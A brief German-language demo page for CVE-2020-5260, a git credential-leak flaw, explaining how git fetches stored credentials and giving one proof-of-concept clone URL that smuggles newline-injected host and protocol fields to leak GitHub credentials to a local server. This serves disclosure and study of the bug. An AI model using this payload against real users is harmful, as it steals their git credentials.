CVE-2020-5260
CVE-2020-5260 Demo-Aufzeichnung
- Wenn git Befehle wie „git clone https://example.com" ausführt, fordert es die Speicherung der Anmeldeinformationen für den Host „example.com" mit dem Protokoll „https" an und hängt die zurückgegebenen Anmeldeinformationen an die gesendete Anfrage an, wenn der Remote-Endpunkt eine Authentifizierung verlangt.
git clone 'http://localhost:8088/%0ahost=github.com%0aprotocol=https

Referenzlinks:
https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
https://github.com/brompwnie/cve-2020-5260